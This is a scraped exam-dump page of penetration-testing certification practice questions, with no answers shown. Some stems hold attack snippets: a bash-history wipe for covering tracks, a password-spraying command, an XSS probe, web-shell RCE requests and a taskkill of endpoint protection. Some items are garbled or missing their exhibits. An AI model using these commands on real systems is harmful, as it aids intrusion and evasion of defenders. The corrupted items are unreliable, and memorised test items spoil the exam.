Halloween Special Sale Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: buysanta

Exact2Pass Menu

Question # 4

A penetration tester is examining a Class C network to identify active systems quickly. Which of the following commands should the penetration tester use?

A.

nmap גsn 192.168.0.1/16

B.

nmap גsn 192.168.0.1-254

C.

nmap גsn 192.168.0.1 192.168.0.1.254

D.

nmap גsN 192.168.0.0/24

Full Access
Question # 5

A client has requested that the penetration test scan include the following UDP services: SNMP, NetBIOS, and DNS. Which of the following Nmap commands will perform the scan?

A.

nmap –vv sUV –p 53, 123-159 10.10.1.20/24 –oA udpscan

B.

nmap –vv sUV –p 53,123,161-162 10.10.1.20/24 –oA udpscan

C.

nmap –vv sUV –p 53,137-139,161-162 10.10.1.20/24 –oA udpscan

D.

nmap –vv sUV –p 53, 122-123, 160-161 10.10.1.20/24 –oA udpscan

Full Access
Question # 6

Which of the following should a penetration tester attack to gain control of the state in the HTTP protocol after the user is logged in?

A.

HTTPS communication

B.

Public and private keys

C.

Password encryption

D.

Sessions and cookies

Full Access
Question # 7

A penetration tester gains access to a system and establishes persistence, and then runs the following commands:

cat /dev/null > temp

touch –r .bash_history temp

mv temp .bash_history

Which of the following actions is the tester MOST likely performing?

A.

Redirecting Bash history to /dev/null

B.

Making a copy of the user's Bash history for further enumeration

C.

Covering tracks by clearing the Bash history

D.

Making decoy files on the system to confuse incident responders

Full Access
Question # 8

Which of the following documents describes specific activities, deliverables, and schedules for a penetration tester?

A.

NDA

B.

MSA

C.

SOW

D.

MOU

Full Access
Question # 9

A penetration tester has identified several newly released CVEs on a VoIP call manager. The scanning tool the tester used determined the possible presence of the CVEs based off the version number of the service. Which of the following methods would BEST support validation of the possible findings?

A.

Manually check the version number of the VoIP service against the CVE release

B.

Test with proof-of-concept code from an exploit database

C.

Review SIP traffic from an on-path position to look for indicators of compromise

D.

Utilize an nmap –sV scan against the service

Full Access
Question # 10

A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following:

Which of the following tools will help the tester prepare an attack for this scenario?

A.

Hydra and crunch

B.

Netcat and cURL

C.

Burp Suite and DIRB

D.

Nmap and OWASP ZAP

Full Access
Question # 11

An assessment has been completed, and all reports and evidence have been turned over to the client. Which of the following should be done NEXT to ensure the confidentiality of the client’s information?

A.

Follow the established data retention and destruction process

B.

Report any findings to regulatory oversight groups

C.

Publish the findings after the client reviews the report

D.

Encrypt and store any client information for future analysis

Full Access
Question # 12

A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running. Which of the following would BEST support this task?

A.

Run nmap with the –o, -p22, and –sC options set against the target

B.

Run nmap with the –sV and –p22 options set against the target

C.

Run nmap with the --script vulners option set against the target

D.

Run nmap with the –sA option set against the target

Full Access
Question # 13

A penetration tester recently completed a review of the security of a core network device within a corporate environment. The key findings are as follows:

• The following request was intercepted going to the network device:

GET /login HTTP/1.1

Host: 10.50.100.16

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0

Accept-Language: en-US,en;q=0.5

Connection: keep-alive

Authorization: Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk

• Network management interfaces are available on the production network.

• An Nmap scan returned the following:

Which of the following would be BEST to add to the recommendations section of the final report? (Choose two.)

A.

Enforce enhanced password complexity requirements.

B.

Disable or upgrade SSH daemon.

C.

Disable HTTP/301 redirect configuration.

D.

Create an out-of-band network for management.

E.

Implement a better method for authentication.

F.

Eliminate network management and control interfaces.

Full Access
Question # 14

Deconfliction is necessary when the penetration test:

A.

determines that proprietary information is being stored in cleartext.

B.

occurs during the monthly vulnerability scanning.

C.

uncovers indicators of prior compromise over the course of the assessment.

D.

proceeds in parallel with a criminal digital forensic investigation.

Full Access
Question # 15

A new client hired a penetration-testing company for a month-long contract for various security assessments against the client’s new service. The client is expecting to make the new service publicly available shortly after the assessment is complete and is planning to fix any findings, except for critical issues, after the service is made public. The client wants a simple report structure and does not want to receive daily findings.

Which of the following is most important for the penetration tester to define FIRST?

A.

Establish the format required by the client.

B.

Establish the threshold of risk to escalate to the client immediately.

C.

Establish the method of potential false positives.

D.

Establish the preferred day of the week for reporting.

Full Access
Question # 16

When developing a shell script intended for interpretation in Bash, the interpreter /bin/bash should be explicitly specified. Which of the following character combinations should be used on the first line of the script to accomplish this goal?

A.

<#

B.

<$

C.

##

D.

#$

E.

#!

Full Access
Question # 17

A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet. Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be

valid?

A.

PLCs will not act upon commands injected over the network.

B.

Supervisors and controllers are on a separate virtual network by default.

C.

Controllers will not validate the origin of commands.

D.

Supervisory systems will detect a malicious injection of code/commands.

Full Access
Question # 18

A penetration tester writes the following script:

Which of the following objectives is the tester attempting to achieve?

A.

Determine active hosts on the network.

B.

Set the TTL of ping packets for stealth.

C.

Fill the ARP table of the networked devices.

D.

Scan the system on the most used ports.

Full Access
Question # 19

During an internal penetration test against a company, a penetration tester was able to navigate to another part of the network and locate a folder containing customer information such as addresses, phone numbers, and credit card numbers. To be PCI compliant, which of the following should the company have implemented to BEST protect this data?

A.

Vulnerability scanning

B.

Network segmentation

C.

System hardening

D.

Intrusion detection

Full Access
Question # 20

A consultant just performed a SYN scan of all the open ports on a remote host and now needs to remotely identify the type of services that are running on the host. Which of the following is an active reconnaissance tool that would be BEST to use to accomplish this task?

A.

tcpdump

B.

Snort

C.

Nmap

D.

Netstat

E.

Fuzzer

Full Access
Question # 21

A penetration tester ran an Nmap scan on an Internet-facing network device with the –F option and found a few open ports. To further enumerate, the tester ran another scan using the following command:

nmap –O –A –sS –p- 100.100.100.50

Nmap returned that all 65,535 ports were filtered. Which of the following MOST likely occurred on the second scan?

A.

A firewall or IPS blocked the scan.

B.

The penetration tester used unsupported flags.

C.

The edge network device was disconnected.

D.

The scan returned ICMP echo replies.

Full Access
Question # 22

Which of the following documents describes activities that are prohibited during a scheduled penetration test?

A.

MSA

B.

NDA

C.

ROE

D.

SLA

Full Access
Question # 23

A penetration tester wrote the following script to be used in one engagement:

Which of the following actions will this script perform?

A.

Look for open ports.

B.

Listen for a reverse shell.

C.

Attempt to flood open ports.

D.

Create an encrypted tunnel.

Full Access
Question # 24

A company is concerned that its cloud VM is vulnerable to a cyberattack and proprietary data may be stolen. A penetration tester determines a vulnerability does exist and exploits the vulnerability by adding a fake VM instance to the IaaS component of the client's VM. Which of the following cloud attacks did the penetration tester MOST likely implement?

A.

Direct-to-origin

B.

Cross-site scripting

C.

Malware injection

D.

Credential harvesting

Full Access
Question # 25

A penetration tester wants to validate the effectiveness of a DLP product by attempting exfiltration of data using email attachments. Which of the following techniques should the tester select to accomplish this task?

A.

Steganography

B.

Metadata removal

C.

Encryption

D.

Encode64

Full Access
Question # 26

A penetration tester runs a scan against a server and obtains the following output:

21/tcp open ftp Microsoft ftpd

| ftp-anon: Anonymous FTP login allowed (FTP code 230)

| 03-12-20 09:23AM 331 index.aspx

| ftp-syst:

135/tcp open msrpc Microsoft Windows RPC

139/tcp open netbios-ssn Microsoft Windows netbios-ssn

445/tcp open microsoft-ds Microsoft Windows Server 2012 Std

3389/tcp open ssl/ms-wbt-server

| rdp-ntlm-info:

| Target Name: WEB3

| NetBIOS_Computer_Name: WEB3

| Product_Version: 6.3.9600

|_ System_Time: 2021-01-15T11:32:06+00:00

8443/tcp open http Microsoft IIS httpd 8.5

| http-methods:

|_ Potentially risky methods: TRACE

|_http-server-header: Microsoft-IIS/8.5

|_http-title: IIS Windows Server

Which of the following command sequences should the penetration tester try NEXT?

A.

ftp 192.168.53.23

B.

smbclient \\\\WEB3\\IPC$ -I 192.168.53.23 –U guest

C.

ncrack –u Administrator –P 15worst_passwords.txt –p rdp 192.168.53.23

E.

nmap –-script vuln –sV 192.168.53.23

Full Access
Question # 27

Which of the following documents must be signed between the penetration tester and the client to govern how any provided information is managed before, during, and after the engagement?

A.

MSA

B.

NDA

C.

SOW

D.

ROE

Full Access
Question # 28

The following output is from reconnaissance on a public-facing banking website:

Based on these results, which of the following attacks is MOST likely to succeed?

A.

A birthday attack on 64-bit ciphers (Sweet32)

B.

An attack that breaks RC4 encryption

C.

An attack on a session ticket extension (Ticketbleed)

D.

A Heartbleed attack

Full Access
Question # 29

A penetration tester ran a ping –A command during an unknown environment test, and it returned a 128 TTL packet. Which of the following OSs would MOST likely return a packet of this type?

A.

Windows

B.

Apple

C.

Linux

D.

Android

Full Access
Question # 30

A penetration tester wants to find the password for any account in the domain without locking any of the accounts. Which of the following commands should the tester use?

A.

enum4linux -u userl -p /passwordList.txt 192.168.0.1

B.

enum4linux -u userl -p Passwordl 192.168.0.1

C.

cme smb 192.168.0.0/24 -u /userList.txt -p /passwordList.txt

D.

cme smb 192.168.0.0/24 -u /userList.txt -p Summer123

Full Access
Question # 31

When planning a penetration-testing effort, clearly expressing the rules surrounding the optimal time of day for test execution is important because:

A.

security compliance regulations or laws may be violated.

B.

testing can make detecting actual APT more challenging.

C.

testing adds to the workload of defensive cyber- and threat-hunting teams.

D.

business and network operations may be impacted.

Full Access
Question # 32

A penetration tester discovered a code repository and noticed passwords were hashed before they were stored in the database with the following code? salt = ‘123’ hash = hashlib.pbkdf2_hmac(‘sha256’, plaintext, salt, 10000) The tester recommended the code be updated to the following salt = os.urandom(32) hash = hashlib.pbkdf2_hmac(‘sha256’, plaintext, salt, 10000) Which of the following steps should the penetration tester recommend?

A.

Changing passwords that were created before this code update

B.

Keeping hashes created by both methods for compatibility

C.

Rehashing all old passwords with the new code

D.

Replacing the SHA-256 algorithm to something more secure

Full Access
Question # 33

A penetration tester analyzed a web-application log file and discovered an input that was sent to the company's web application. The input contains a string that says "WAITFOR." Which of the following attacks is being attempted?

A.

SQL injection

B.

HTML injection

C.

Remote command injection

D.

DLL injection

Full Access
Question # 34

A tester who is performing a penetration test discovers an older firewall that is known to have serious vulnerabilities to remote attacks but is not part of the original list of IP addresses for the engagement. Which of the

following is the BEST option for the tester to take?

A.

Segment the firewall from the cloud.

B.

Scan the firewall for vulnerabilities.

C.

Notify the client about the firewall.

D.

Apply patches to the firewall.

Full Access
Question # 35

During a web application test, a penetration tester was able to navigate to https://company.com and view all links on the web page. After manually reviewing the pages, the tester used a web scanner to automate the search for vulnerabilities. When returning to the web application, the following message appeared in the browser: unauthorized to view this page. Which of the following BEST explains what occurred?

A.

The SSL certificates were invalid.

B.

The tester IP was blocked.

C.

The scanner crashed the system.

D.

The web page was not found.

Full Access
Question # 36

During an assessment, a penetration tester obtains a list of 30 email addresses by crawling the target company's website and then creates a list of possible usernames based on the email address format. Which of the following types of attacks would MOST likely be used to avoid account lockout?

A.

Mask

B.

Rainbow

C.

Dictionary

D.

Password spraying

Full Access
Question # 37

A security firm is discussing the results of a penetration test with the client. Based on the findings, the client wants to focus the remaining time on a critical network segment. Which of the following BEST describes the action taking place?

A.

Maximizing the likelihood of finding vulnerabilities

B.

Reprioritizing the goals/objectives

C.

Eliminating the potential for false positives

D.

Reducing the risk to the client environment

Full Access
Question # 38

Which of the following assessment methods is MOST likely to cause harm to an ICS environment?

A.

Active scanning

B.

Ping sweep

C.

Protocol reversing

D.

Packet analysis

Full Access
Question # 39

A penetration tester is required to perform a vulnerability scan that reduces the likelihood of false positives and increases the true positives of the results. Which of the following would MOST likely accomplish this goal?

A.

Using OpenVAS in default mode

B.

Using Nessus with credentials

C.

Using Nmap as the root user

D.

Using OWASP ZAP

Full Access
Question # 40

A penetration tester downloaded a Java application file from a compromised web server and identifies how to invoke it by looking at the following log:

Which of the following is the order of steps the penetration tester needs to follow to validate whether the Java application uses encryption over sockets?

A.

Run an application vulnerability scan and then identify the TCP ports used by the application.

B.

Run the application attached to a debugger and then review the application's log.

C.

Disassemble the binary code and then identify the break points.

D.

Start a packet capture with Wireshark and then run the application.

Full Access
Question # 41

A penetration tester uncovers access keys within an organization's source code management solution. Which of the following would BEST address the issue? (Choose two.)

A.

Setting up a secret management solution for all items in the source code management system

B.

Implementing role-based access control on the source code management system

C.

Configuring multifactor authentication on the source code management system

D.

Leveraging a solution to scan for other similar instances in the source code management system

E.

Developing a secure software development life cycle process for committing code to the source code management system

F.

Creating a trigger that will prevent developers from including passwords in the source code management system

Full Access
Question # 42

Which of the following is a regulatory compliance standard that focuses on user privacy by implementing the right to be forgotten?

A.

NIST SP 800-53

B.

ISO 27001

C.

GDPR

Full Access
Question # 43

A final penetration test report has been submitted to the board for review and accepted. The report has three findings rated high. Which of the following should be the NEXT step?

A.

Perform a new penetration test.

B.

Remediate the findings.

C.

Provide the list of common vulnerabilities and exposures.

D.

Broaden the scope of the penetration test.

Full Access
Question # 44

The following PowerShell snippet was extracted from a log of an attacker machine:

A penetration tester would like to identify the presence of an array. Which of the following line numbers would define the array?

A.

Line 8

B.

Line 13

C.

Line 19

D.

Line 20

Full Access
Question # 45

Penetration tester who was exclusively authorized to conduct a physical assessment noticed there were no cameras pointed at the dumpster for company. The penetration tester returned at night and collected garbage that contained receipts for recently purchased networking :. The models of equipment purchased are vulnerable to attack. Which of the following is the most likely next step for the penetration?

A.

Alert the target company of the discovered information.

B.

Verify the discovered information is correct with the manufacturer.

C.

Scan the equipment and verify the findings.

D.

Return to the dumpster for more information.

Full Access
Question # 46

A penetration tester is trying to restrict searches on Google to a specific domain. Which of the following commands should the penetration tester consider?

A.

inurl:

B.

link:

C.

site:

D.

intitle:

Full Access
Question # 47

Which of the following can be used to store alphanumeric data that can be fed into scripts or programs as input to penetration-testing tools?

A.

Dictionary

B.

Directory

C.

Symlink

D.

Catalog

E.

For-loop

Full Access
Question # 48

A Chief Information Security Officer wants to evaluate the security of the company's e-commerce application. Which of the following tools should a penetration tester use FIRST to obtain relevant information from the application without triggering alarms?

A.

SQLmap

B.

DirBuster

C.

w3af

D.

OWASP ZAP

Full Access
Question # 49

Which of the following is the MOST important information to have on a penetration testing report that is written for the developers?

A.

Executive summary

B.

Remediation

C.

Methodology

D.

Metrics and measures

Full Access
Question # 50

A penetration tester receives the following results from an Nmap scan:

Which of the following OSs is the target MOST likely running?

A.

CentOS

B.

Arch Linux

C.

Windows Server

D.

Ubuntu

Full Access
Question # 51

A software company has hired a security consultant to assess the security of the company's software development practices. The consultant opts to begin reconnaissance by performing fuzzing on a software binary. Which of the following vulnerabilities is the security consultant MOST likely to identify?

A.

Weak authentication schemes

B.

Credentials stored in strings

C.

Buffer overflows

D.

Non-optimized resource management

Full Access
Question # 52

During the assessment of a client's cloud and on-premises environments, a penetration tester was able to gain ownership of a storage object within the cloud environment using the provided on-premises credentials. Which of the following best describes why the tester was able to gain access?

A.

Federation misconfiguration of the container

B.

Key mismanagement between the environments

C.

laaS failure at the provider

D.

Container listed in the public domain

Full Access
Question # 53

A penetration tester is cleaning up and covering tracks at the conclusion of a penetration test. Which of the following should the tester be sure to remove from the system? (Choose two.)

A.

Spawned shells

B.

Created user accounts

C.

Server logs

D.

Administrator accounts

E.

Reboot system

F.

ARP cache

Full Access
Question # 54

A penetration tester will be performing a vulnerability scan as part of the penetration test on a client's website. The tester plans to run several Nmap scripts that probe for vulnerabilities while avoiding detection. Which of the following Nmap options will the penetration tester MOST likely utilize?

A.

-а8 -T0

B.

--script "http*vuln*"

C.

-sn

D.

-O -A

Full Access
Question # 55

A security analyst needs to perform a scan for SMB port 445 over a/16 network. Which of the following commands would be the BEST option when stealth is not a concern and the task is time sensitive?

A.

Nmap -s 445 -Pn -T5 172.21.0.0/16

B.

Nmap -p 445 -n -T4 -open 172.21.0.0/16

C.

Nmap -sV --script=smb* 172.21.0.0/16

D.

Nmap -p 445 -max -sT 172. 21.0.0/16

Full Access
Question # 56

A penetration tester runs the following command:

l.comptia.local axfr comptia.local

which of the following types of information would be provided?

A.

The DNSSEC certificate and CA

B.

The DHCP scopes and ranges used on the network

C.

The hostnames and IP addresses of internal systems

D.

The OS and version of the DNS server

Full Access
Question # 57

A penetration tester gains access to a web server and notices a large number of devices in the system ARP table. Upon scanning the web server, the tester determines that many of the devices are user ...ch of the following should be included in the recommendations for remediation?

A.

training program on proper access to the web server

B.

patch-management program for the web server.

C.

the web server in a screened subnet

D.

Implement endpoint  protection on the workstations

Full Access
Question # 58

Which of the following components should a penetration tester most likely include in a report at the end of an assessment?

A.

Metrics and measures

B.

Client interviews

C.

Compliance information

D.

Business policies

Full Access
Question # 59

Which of the following would assist a penetration tester the MOST when evaluating the susceptibility of top-level executives to social engineering attacks?

A.

Scraping social media for personal details

B.

Registering domain names that are similar to the target company's

C.

Identifying technical contacts at the company

D.

Crawling the company's website for company information

Full Access
Question # 60

Which of the following types of assessments MOST likely focuses on vulnerabilities with the objective to access specific data?

A.

An unknown-environment assessment

B.

A known-environment assessment

C.

A red-team assessment

D.

A compliance-based assessment

Full Access
Question # 61

The output from a penetration testing tool shows 100 hosts contained findings due to improper patch management. Which of the following did the penetration tester perform?

A.

A vulnerability scan

B.

A WHOIS lookup

C.

A packet capture

D.

An Nmap scan

Full Access
Question # 62

A penetration tester who is working remotely is conducting a penetration test using a wireless connection. Which of the following is the BEST way to provide confidentiality for the client while using this connection?

A.

Configure wireless access to use a AAA server.

B.

Use random MAC addresses on the penetration testing distribution.

C.

Install a host-based firewall on the penetration testing distribution.

D.

Connect to the penetration testing company's VPS using a VPN.

Full Access
Question # 63

A penetration tester is testing a new version of a mobile application in a sandbox environment. To intercept and decrypt the traffic between the application and the external API, the tester has created a private root CA and issued a certificate from it. Even though the tester installed the root CA into the trusted stone of the smartphone used for the tests, the application shows an error indicating a certificate mismatch and does not connect to the server. Which of the following is the MOST likely reason for the error?

A.

TCP port 443 is not open on the firewall

B.

The API server is using SSL instead of TLS

C.

The tester is using an outdated version of the application

D.

The application has the API certificate pinned.

Full Access
Question # 64

Which of the following factors would a penetration tester most likely consider when testing at a location?

A.

Determine if visas are required.

B.

Ensure all testers can access all sites.

C.

Verify the tools being used are legal for use at all sites.

D.

Establish the time of the day when a test can occur.

Full Access
Question # 65

A penetration tester found several critical SQL injection vulnerabilities during an assessment of a client's system. The tester would like to suggest mitigation to the client as soon as possible.

Which of the following remediation techniques would be the BEST to recommend? (Choose two.)

A.

Closing open services

B.

Encryption users' passwords

C.

Randomizing users' credentials

D.

Users' input validation

E.

Parameterized queries

F.

Output encoding

Full Access
Question # 66

A penetration tester is evaluating a company's network perimeter. The tester has received limited information about defensive controls or countermeasures, and limited internal knowledge of the testing exists. Which of the following should be the FIRST step to plan the reconnaissance activities?

A.

Launch an external scan of netblocks.

B.

Check WHOIS and netblock records for the company.

C.

Use DNS lookups and dig to determine the external hosts.

D.

Conduct a ping sweep of the company's netblocks.

Full Access
Question # 67

A penetration tester is preparing a credential stuffing attack against a company's website. Which of the following can be used to passively get the most relevant information?

A.

Shodan

B.

BeEF

C.

HavelBeenPwned

D.

Maltego

Full Access
Question # 68

A penetration tester gives the following command to a systems administrator to execute on one of the target servers:

rm -f /var/www/html/G679h32gYu.php

Which of the following BEST explains why the penetration tester wants this command executed?

A.

To trick the systems administrator into installing a rootkit

B.

To close down a reverse shell

C.

To remove a web shell after the penetration test

D.

To delete credentials the tester created

Full Access
Question # 69

During an assessment, a penetration tester was able to access the organization's wireless network from outside of the building using a laptop running Aircrack-ng. Which of the following should be recommended to the client to remediate this issue?

A.

Changing to Wi-Fi equipment that supports strong encryption

B.

Using directional antennae

C.

Using WEP encryption

D.

Disabling Wi-Fi

Full Access
Question # 70

A penetration tester, who is doing an assessment, discovers an administrator has been exfiltrating proprietary company information. The administrator offers to pay the tester to keep quiet. Which of the following is the BEST action for the tester to take?

A.

Check the scoping document to determine if exfiltration is within scope.

B.

Stop the penetration test.

C.

Escalate the issue.

D.

Include the discovery and interaction in the daily report.

Full Access
Question # 71

A penetration tester is conducting an assessment on 192.168.1.112. Given the following output:

[ATTEMPT] target 192.168.1.112 - login "root" - pass "abcde"

[ATTEMPT] target 192.168.1.112 - login "root" - pass "edcfg"

[ATTEMPT] target 192.168.1.112 - login "root" - pass "qazsw"

[ATTEMPT] target 192.168.1.112 - login "root" – pass “tyuio”

Which of the following is the penetration tester conducting?

A.

Port scan

B.

Brute force

C.

Credential stuffing

D.

DoS attack

Full Access
Question # 72

During a vulnerability scanning phase, a penetration tester wants to execute an Nmap scan using custom NSE scripts stored in the following folder:

/home/user/scripts

Which of the following commands should the penetration tester use to perform this scan?

A.

nmap resume "not intrusive"

B.

nmap script default safe

C.

nmap script /home/user/scripts

D.

nmap -load /home/user/scripts

Full Access
Question # 73

A penetration tester managed to get control of an internal web server that is hosting the IT knowledge base. Which of the following attacks should the penetration tester attempt next?

A.

Vishing

B.

Watering hole

C.

Whaling

D.

Spear phishing

Full Access
Question # 74

After performing a web penetration test, a security consultant is ranking the findings by criticality. Which of the following standards or methodologies would be best for the consultant to use for reference?

A.

OWASP

B.

MITRE ATT&CK

C.

PTES

D.

NIST

Full Access
Question # 75

Which of the following tools provides Python classes for interacting with network protocols?

A.

Responder

B.

Impacket

C.

Empire

D.

PowerSploit

Full Access
Question # 76

A penetration tester is conducting a test after hours and notices a critical system was taken down. Which of the following contacts should be notified first?

A.

Secondary

B.

Emergency

C.

Technical

D.

Primary

Full Access
Question # 77

A penetration tester is starting an assessment but only has publicly available information about the target company. The client is aware of this exercise and is preparing for the test.

Which of the following describes the scope of the assessment?

A.

Partially known environment testing

B.

Known environment testing

C.

Unknown environment testing

D.

Physical environment testing

Full Access
Question # 78

After successfully compromising a remote host, a security consultant notices an endpoint protection software is running on the host. Which of the following commands would be

best for the consultant to use to terminate the protection software and its child processes?

A.

taskkill /PID /T /F

B.

taskkill /PID /IM /F

C.

taskkill /PID /S /U

D.

taskkill /PID /F /P

Full Access
Question # 79

During an engagement, a junior penetration tester found a multihomed host that led to an unknown network segment. The penetration tester ran a port scan against the network segment, which caused an outage at the customer's factory. Which of the following documents should the junior penetration tester most likely follow to avoid this issue in the future?

A.

NDA

B.

MSA

C.

ROE

D.

SLA

Full Access
Question # 80

During a vulnerability scan a penetration tester enters the following Nmap command against all of the non-Windows clients:

nmap -sX -T4 -p 21-25, 67, 80, 139, 8080 192.168.11.191

The penetration tester reviews the packet capture in Wireshark and notices that the target responds with an RST packet flag set for all of the targeted ports. Which of the following does this information most likely indicate?

A.

All of the ports in the target range are closed.

B.

Nmap needs more time to scan the ports in the target range.

C.

The ports in the target range cannot be scanned because they are common UDP ports.

D.

All of the ports in the target range are open.

Full Access
Question # 81

During a code review assessment, a penetration tester finds the following vulnerable code inside one of the web application files:

<% String id = request.getParameter("id"); %>

Employee ID: <%= id %>

Which of the following is the best remediation to prevent a vulnerability from being exploited, based on this code?

A.

Parameterized queries

B.

Patch application

C.

Output encoding

Full Access
Question # 82

In Java and C/C++, variable initialization is critical because:

A.

the unknown value, when used later, will cause unexpected behavior.

B.

the compiler will assign null to the variable, which will cause warnings and errors.

C.

the initial state of the variable creates a race condition.

D.

the variable will not have an object type assigned to it.

Full Access
Question # 83

Which of the following types of information would most likely be included in an application security assessment report addressed to developers? (Select two).

A.

Use of non-optimized sort functions

B.

Poor input sanitization

C.

Null pointer dereferences

D.

Non-compliance with code style guide

E.

Use of deprecated Javadoc tags

F.

A cyclomatic complexity score of 3

Full Access
Question # 84

A penetration tester is performing an assessment of an application that allows users to upload documents to a cloud-based file server for easy access anywhere in the world. Which of the following would most likely allow a tester to access unintentionally exposed documents?

A.

Directory traversal attack

B.

Cross-site request forgery

C.

Cross-site scripting attack

D.

Session attack

Full Access
Question # 85

An organization's Chief Information Security Officer debates the validity of a critical finding from a penetration assessment that was completed six months ago. Which of the following post-report delivery activities would have most likely prevented this scenario?

A.

Client acceptance

B.

Data destruction process

C.

Attestation of findings

D.

Lessons learned

Full Access
Question # 86

An executive needs to use Wi-Fi to connect to the company's server while traveling. While looking for available Wi-Fi connections, the executive notices an available access point to a hotel chain that is not available where the executive is staying. Which of the following attacks is the executive most likely experiencing?

A.

Data modification

B.

Amplification

C.

Captive portal

D.

Evil twin

Full Access
Question # 87

A company uses a cloud provider with shared network bandwidth to host a web application on dedicated servers. The company's contact with the cloud provider prevents any activities that would interfere with the cloud provider's other customers. When engaging with a penetration-testing company to test the application, which of the following should the company avoid?

A.

Crawling the web application's URLs looking for vulnerabilities

B.

Fingerprinting all the IP addresses of the application's servers

C.

Brute forcing the application's passwords

D.

Sending many web requests per second to test DDoS protection

Full Access
Question # 88

A company developed a new web application to allow its customers to submit loan applications. A penetration tester is reviewing the application and discovers that the application was developed in ASP and used MSSQL for its back-end database. Using the application's search form, the penetration tester inputs the following code in the search input field:

IMG SRC=vbscript:msgbox ("Vulnerable_to_Attack") ; >originalAttribute="SRC"originalPath="vbscript;msgbox ("Vulnerable_to_Attack ") ;>"

When the tester checks the submit button on the search form, the web browser returns a pop-up windows that displays "Vulnerable_to_Attack." Which of the following vulnerabilities did the tester discover in the web application?

A.

SQL injection

B.

Command injection

C.

Cross-site request forgery

D.

Cross-site scripting

Full Access
Question # 89

A penetration tester is performing a vulnerability scan on a large ATM network. One of the organization's requirements is that the scan does not affect legitimate clients' usage of the ATMs. Which of the following should the tester do to best meet the company's vulnerability scan requirements?

A.

Use Nmap's -T2 switch to run a slower scan and with less resources.

B.

Run the scans using multiple machines.

C.

Run the scans only during lunch hours.

D.

Use Nmap's -host-timeout switch to skip unresponsive targets.

Full Access
Question # 90

A penetration tester requested, without express authorization, that a CVE number be assigned for a new vulnerability found on an internal client application. Which of the following did the penetration tester most likely breach?

A.

ROE

B.

SLA

C.

NDA

D.

SOW

Full Access
Question # 91

During an assessment, a penetration tester needs to perform a cloud asset discovery of an organization. Which of the following tools would most likely provide more accurate results in this situation?

A.

Pacu

B.

Scout Suite

C.

Shodan

D.

TruffleHog

Full Access
Question # 92

A penetration tester is conducting an assessment on a web application. Which of the following active reconnaissance techniques would be best for the tester to use to gather additional information about the application?

A.

Using cURL with the verbose option

B.

Crawling UR Is using an interception proxy

C.

Using Scapy for crafted requests

D.

Crawling URIs using a web browser

Full Access
Question # 93

Which of the following should be included in scope documentation?

A.

Service accounts

B.

Tester experience

C.

Disclaimer

D.

Number of tests

Full Access
Question # 94

Which of the following is the most important to include in the scope of a wireless security assessment?

A.

Frequencies

B.

APs

C.

SSIDs

D.

Signal strengths

Full Access
Question # 95

Which of the following is the most important aspect to consider when calculating the price of a penetration test service for a client?

A.

Operating cost

B.

Required scope of work

C.

Non-disclosure agreement

D.

Client's budget

Full Access
Question # 96

A penetration tester captures SMB network traffic and discovers that users are mistyping the name of a fileshare server. This causes the workstations to send out requests attempting to resolve the fileshare server's name. Which of the following is the best way for a penetration tester to exploit this situation?

A.

Relay the traffic to the real file server and steal documents as they pass through.

B.

Host a malicious file to compromise the workstation.

C.

Reply to the broadcasts with a fake IP address to deny access to the real file server.

D.

Respond to the requests with the tester's IP address and steal authentication credentials.

Full Access
Question # 97

Which of the following describes a globally accessible knowledge base of adversary tactics and techniques based on real-world observations?

A.

OWASP Top 10

B.

MITRE ATT&CK

C.

Cyber Kill Chain

D.

Well-Architected Framework

Full Access
Question # 98

During a REST API security assessment, a penetration tester was able to sniff JSON content containing user credentials. The JSON structure was as follows:

<

transaction_id: "1234S6", content: [ {

user_id: "mrcrowley", password: ["€54321#"] b <

user_id: "ozzy",

password: ["1112228"] ) ]

Assuming that the variable json contains the parsed JSON data, which of the following Python code snippets correctly returns the password for the user ozzy?

A.

json['content']['password'][1]

B.

json['user_id']['password'][0][1]

C.

json['content'][1]['password'][0]

D.

json['content'][0]['password'][1]

Full Access
Question # 99

During a penetration test of a server application, a security consultant found that the application randomly crashed or remained stable after opening several simultaneous connections to the application and always submitting the same packets of data. Which of the following is the best sequence of steps the tester should use to understand and exploit the vulnerability?

A.

Attacha remoteprofiler to the server application. Establish a random number of connections to the server application. Send fixed packets of data simultaneously using those connections.

B.

Attacha remotedebugger to the server application. Establish a large number of connections to the server application. Send fixed packets of data simultaneously using those connections.

C.

Attacha local disassembler to the server application. Establish a single connection to the server application. Send fixed packets of data simultaneously using that connection.

D.

Attacha remotedisassembler to the server application. Establish a small number of connections to the server application. Send fixed packets of data simultaneously using those connections.

Full Access
Question # 100

A penetration tester was hired to test Wi-Fi equipment. Which of the following tools should be used to gather information about the wireless network?

A.

Kismet

B.

Burp Suite

C.

BeEF

D.

WHOIS

Full Access
Question # 101

A penetration tester fuzzes an internal server looking for hidden services and applications and obtains the following output:

Which of the following is the most likely explanation for the output?

A.

The tester does not have credentials to access the server-status page.

B.

The admin directory cannot be fuzzed because it is forbidden.

C.

The admin, test, and db directories redirect to the log-in page.

D.

The robots.txt file has six entries in it.

Full Access
Question # 102

During an engagement, a penetration tester was able to upload to a server a PHP file with the following content:

Which of the following commands should the penetration tester run to successfully achieve RCE?

A.

python3 -c "import requests;print (requests.post (url='http://172.16.200.10/uploads/shell.php ', data={'cmd=id'}))"

B.

python3 -c "import requests;print (requests.post(url='http://172.16.200.10/uploads/shell.php ', data=

('cmd':'id') ) .text) "

C.

python3 -c "import requests;print (requests.get (url='http://172.16.200.10/uploads/shell.php ', params=

{'cmd':'id'}) )"

D.

python3 -c "import requests;print (requests.get (url='http://172.16.200.10/uploads/shell.php ', params=

('cmd':'id'}) .text) "

Full Access
Question # 103

A vulnerability assessor is looking to establish a baseline of all IPv4 network traffic on the local VLAN without a local IP address. Which of the following Nmap command sequences would best provide this information?

A.

sudonmap—script=bro* -e ethO

B.

sudonmap-sF—script=* -e ethO

C.

sudonmap-sV-sT -p 0-65535 -e ethO

D.

sudonmap-sV-p 0-65535 0.0.0.0/0

Full Access
Question # 104

After obtaining a reverse shell connection, a penetration tester runs the following command: www-data@server!2:sudo -1

